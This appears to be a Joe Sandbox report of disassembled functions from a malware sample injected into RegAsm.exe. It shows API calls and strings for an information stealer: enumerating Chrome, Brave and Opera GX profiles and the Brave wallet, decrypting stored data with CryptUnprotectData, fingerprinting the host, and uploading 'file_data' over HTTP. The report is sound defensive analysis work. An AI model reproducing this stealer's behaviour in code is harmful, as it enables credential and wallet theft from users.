Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

InternetCloseHandle.WININET(?), ref: 004058D2
InternetCloseHandle.WININET(?), ref: 004058DB
StrCmpCA.SHLWAPI(?), ref: 00405213

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

Strings

------, xrefs: 00405295
", xrefs: 0040561F
------, xrefs: 0040569E
build_id, xrefs: 004055F5
mode, xrefs: 00405746
------, xrefs: 0040554D
(, xrefs: 0040591D
", xrefs: 004054D0
------, xrefs: 004053FD
", xrefs: 00405770

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internetlstrlen$lstrcpy$H_prolog$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
String ID: "$"$"$($------$------$------$------$build_id$mode
API String ID: 2237346945-1447386369
Opcode ID: c89f37200f9922f7106968f5488809e0814500ea6250647198128ec8ff4c3949
Instruction ID: b4e14776caadebfe53afa945c4bf6ce093965098b883e79db6b3ac6117d29439
Opcode Fuzzy Hash: c89f37200f9922f7106968f5488809e0814500ea6250647198128ec8ff4c3949
Instruction Fuzzy Hash: 6D425EB190414DEADB11EBE1C956BEEBBB8AF18308F50017EE505B3582DB781B4CCB65

Function 0040C679 Relevance: 44.7, APIs: 19, Strings: 6, Instructions: 924
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0040C67E

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

FindFirstFileA.KERNEL32(00000000,?,00425BD3,00425BD2,00000000,?,00425D1C,?,?,00425BCF,?,?,00000000), ref: 0040C71F
StrCmpCA.SHLWAPI(?,00425D20,?,?,00000000), ref: 0040C786
StrCmpCA.SHLWAPI(?,00425D24,?,?,00000000), ref: 0040C7A0
StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00425D28,?,?,00425BD6,?,?,00000000), ref: 0040C851

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

H, xrefs: 0040D34C
Google Chrome, xrefs: 0040D027
Preferences, xrefs: 0040CA62
\BraveWallet\Preferences, xrefs: 0040CB94
Brave, xrefs: 0040CA43
Opera GX, xrefs: 0040C840

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
String ID: Brave$Google Chrome$H$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 3869166975-1816240570
Opcode ID: 439e0fd3ca5aee69204219003434169115a68c9a8b05ef47bfbb1dba57605cec
Instruction ID: 7e6182c7e919ebae31536edbd22d10e843a74c74831f1e41d64d485d49d03601
Opcode Fuzzy Hash: 439e0fd3ca5aee69204219003434169115a68c9a8b05ef47bfbb1dba57605cec
Instruction Fuzzy Hash: 3A826070900288EADF25EBA5C955BDDBBB4AF19304F5040BEE449B32C2DB78174DCB66

Function 19244CF0 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 461
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,-00000003,04000102,00000000), ref: 19244EE1

Strings

winOpen, xrefs: 19245110
exclusive, xrefs: 19244E81
delayed %dms for lock/sharing conflict at line %d, xrefs: 19244FB5
psow, xrefs: 192451F5

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
API String ID: 823142352-3829269058
Opcode ID: 11a65f9d36c2316244501881849c560cd757138aac397bd99635dd80d174aebc
Instruction ID: 823c016dc0db068c70c10292f7fe37e4bd34336459fde494ee3fde39be28af77
Opcode Fuzzy Hash: 11a65f9d36c2316244501881849c560cd757138aac397bd99635dd80d174aebc
Instruction Fuzzy Hash: F2F1D071A043928BEB18CF34C985B1A77E4FB48705F684A2AFD89D7281DB35D944CB92

Function 0040FCE5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040FCEA

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

GetKeyboardLayoutList.USER32(00000000,00000000,004262AF,00000001,?,00000000), ref: 0040FD1C
LocalAlloc.KERNEL32(00000040,00000000,?,00000000), ref: 0040FD2A
GetKeyboardLayoutList.USER32(00000000,00000000,?,00000000), ref: 0040FD35
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000), ref: 0040FD5F

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

LocalFree.KERNEL32(?), ref: 0040FE03

Strings

/ , xrefs: 0040FD6D

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$H_prologKeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: /
API String ID: 2868853201-4001269591
Opcode ID: 8e81c3fcb6512392ecb3f0709d7808244dc03f0de8ce522feb2af1cedb86ee9d
Instruction ID: 670fa807c41248f436aa2cd72aaefdfaece762a4e3a61ecb974f96717b874319
Opcode Fuzzy Hash: 8e81c3fcb6512392ecb3f0709d7808244dc03f0de8ce522feb2af1cedb86ee9d
Instruction Fuzzy Hash: D231EDB1901119EFDB10EFE5D885AEEBBB9EF48304F54407EE509B3681C7785A88CB64

Function 004106C4 Relevance: 9.1, APIs: 6, Instructions: 67commemoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004106C9
CoCreateInstance.OLE32(00426D5C,00000000,00000001,00426488,?,00000001,00000000,00000000,00000001,?,00000000), ref: 004106F0
SysAllocString.OLEAUT32(?), ref: 004106FD
_wtoi64.MSVCRT ref: 00410738
SysFreeString.OLEAUT32(?), ref: 0041074B
SysFreeString.OLEAUT32(00000000), ref: 00410752

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateH_prologInstance_wtoi64
String ID:
API String ID: 1816492551-0
Opcode ID: 5a519e56b5a3f35fac8b8731372418453ffdd9c68a54ed5590e156cd5d61d494
Instruction ID: 38727b362cf05651e2ba0c167973076b7eb5e8e7f8c877263c03ca4ede2a4bf2
Opcode Fuzzy Hash: 5a519e56b5a3f35fac8b8731372418453ffdd9c68a54ed5590e156cd5d61d494
Instruction Fuzzy Hash: A921A571A00109AFCB00DFA4DD889EE7BB5FF88304B60846EF515E7250C7B59D85CB64

Function 004102C3 Relevance: 7.6, APIs: 5, Instructions: 70processCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004102C8

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410303
Process32First.KERNEL32(00000000,00000128), ref: 00410314
Process32Next.KERNEL32(?,00000128), ref: 0041037C
CloseHandle.KERNEL32(?,?,00000000), ref: 00410389

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32lstrcpy
String ID:
API String ID: 599723951-0
Opcode ID: 3c5e1a4b5d184adccb3d47287da369a41380e06edb1f68eabc3b509b63f4a4a1
Instruction ID: 88ec815686b26defa928efc06cad103335915502f2ebb48a4a43328a16f3c0f2
Opcode Fuzzy Hash: 3c5e1a4b5d184adccb3d47287da369a41380e06edb1f68eabc3b509b63f4a4a1
Instruction Fuzzy Hash: 922109B1A00118ABCB10EFA5C955AEEFBB9AF98344F50407EE415F3291CB785A488B65

Function 0040FC92 Relevance: 6.0, APIs: 4, Instructions: 29memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ), ref: 0040FCA3
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCAA
GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,00426654,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 0040FCB9
wsprintfA.USER32 ref: 0040FCD7

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: 0604e6eb6e2682e20b2124677ba798e9b04fc5edbfebe48aceeb8ffeb4b62a16
Instruction ID: c4178db3a7b5cadc3d34117ce99b3585a5539fb9734740f51f0b0a417066b3ea
Opcode Fuzzy Hash: 0604e6eb6e2682e20b2124677ba798e9b04fc5edbfebe48aceeb8ffeb4b62a16
Instruction Fuzzy Hash: 00E09275700234BBEB1067A8AC0EF87366EAB06725F111262FA15D21D0E6B499048AE5

Function 004062A5 Relevance: 4.5, APIs: 3, Instructions: 46memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004062C8
LocalAlloc.KERNEL32(00000040,?,?), ref: 004062E0
LocalFree.KERNEL32(?), ref: 004062FE

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: a1298b6901399f3ed61b1a780a28c5a3d32356ff32a82b06ef3c757afecfb89f
Instruction ID: e950b9794f619c2f14945d92c2c82b9cfbc0e84929ee7baf067997c9d55b3a17
Opcode Fuzzy Hash: a1298b6901399f3ed61b1a780a28c5a3d32356ff32a82b06ef3c757afecfb89f
Instruction Fuzzy Hash: 38011D7A900218AFDB01EFE8DC849DEBBBDFF48700B10046AFA42E7250D6759950CB50

Function 0040FBCB Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,004265C7), ref: 0040FBD7
HeapAlloc.KERNEL32(00000000,?,?,?,00417274,004265C7), ref: 0040FBDE
GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 669fae420ee6eb1cdbbca0cf155bea1fe1a262ab4713cf9ebff3bc65d35779fa
Instruction ID: 717baa134c2685402ab052e767e48c87ea90d479ce835390d18d57d128390497
Opcode Fuzzy Hash: 669fae420ee6eb1cdbbca0cf155bea1fe1a262ab4713cf9ebff3bc65d35779fa
Instruction Fuzzy Hash: 90D05EB6700204FBE7109BA5DE0DE9BBBBCEB84755F400166FB02D2290DAF09A05CA34

Function 0040FE81 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 0040FE8E
wsprintfA.USER32 ref: 0040FEA3

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: cbe062100e03a9cd5bd2a5b056dc4366336c04a80b9081003c6696508956f941
Instruction ID: cc392225a4cdd4d81fb3b645c3f3a3bcf8ea132c99b34c9dcf4625544169bb0c
Opcode Fuzzy Hash: cbe062100e03a9cd5bd2a5b056dc4366336c04a80b9081003c6696508956f941
Instruction Fuzzy Hash: D8D05B75D0011DD7CF10EB90FC49A8977BCAB04308F4001A1D700F2050E375D61D8BD5

Function 004043AD Relevance: 74.3, APIs: 26, Strings: 16, Instructions: 764
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 004043B2

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7

lstrlenA.KERNEL32(00000000), ref: 00404421

Part of subcall function 00410DAC: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410DD0
Part of subcall function 00410DAC: GetProcessHeap.KERNEL32(00000000,?,?,00404415,?,?,?,?,?,?), ref: 00410DDD
Part of subcall function 00410DAC: HeapAlloc.KERNEL32(00000000,?,00404415,?,?,?,?,?,?), ref: 00410DE4

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

StrCmpCA.SHLWAPI(?,004259DF,004259DB,004259D3,004259CF,004259CE), ref: 004044A4
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004045E9
HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00404623
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404647

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00425A98,00000000,?,?,00000000), ref: 00404B42
lstrlenA.KERNEL32(00000000), ref: 00404B54
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404B66
RtlAllocateHeap.NTDLL(00000000), ref: 00404B6D
lstrlenA.KERNEL32(00000000), ref: 00404B7F
memcpy.MSVCRT ref: 00404B92
lstrlenA.KERNEL32(00000000,?,?), ref: 00404BA9
memcpy.MSVCRT ref: 00404BB3
lstrlenA.KERNEL32(00000000), ref: 00404BC4
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404BDD
memcpy.MSVCRT ref: 00404BEA
lstrlenA.KERNEL32(00000000,?,00000000), ref: 00404BFF
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404C10
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404C37
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404CB9
StrCmpCA.SHLWAPI(00000000,block), ref: 00404CD1
ExitProcess.KERNEL32 ref: 00404CDC
InternetCloseHandle.WININET(?), ref: 00404CEC

Strings

", xrefs: 004049C1
------, xrefs: 00404A3D
file_data, xrefs: 00404AE5
ERROR, xrefs: 00404DBB
------, xrefs: 0040479D
------, xrefs: 0040464D
", xrefs: 0040486F
ERROR, xrefs: 00404C44
", xrefs: 00404B0F
", xrefs: 00404720
------, xrefs: 004048EE
--, xrefs: 00404544
block, xrefs: 00404CC3
build_id, xrefs: 00404845
------, xrefs: 0040451D
/, xrefs: 00404C97

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$H_prologHeap$HttpProcessmemcpy$OpenRequestlstrcat$AllocAllocateBinaryCloseConnectCrackCryptExitFileHandleInfoOptionQueryReadSendString
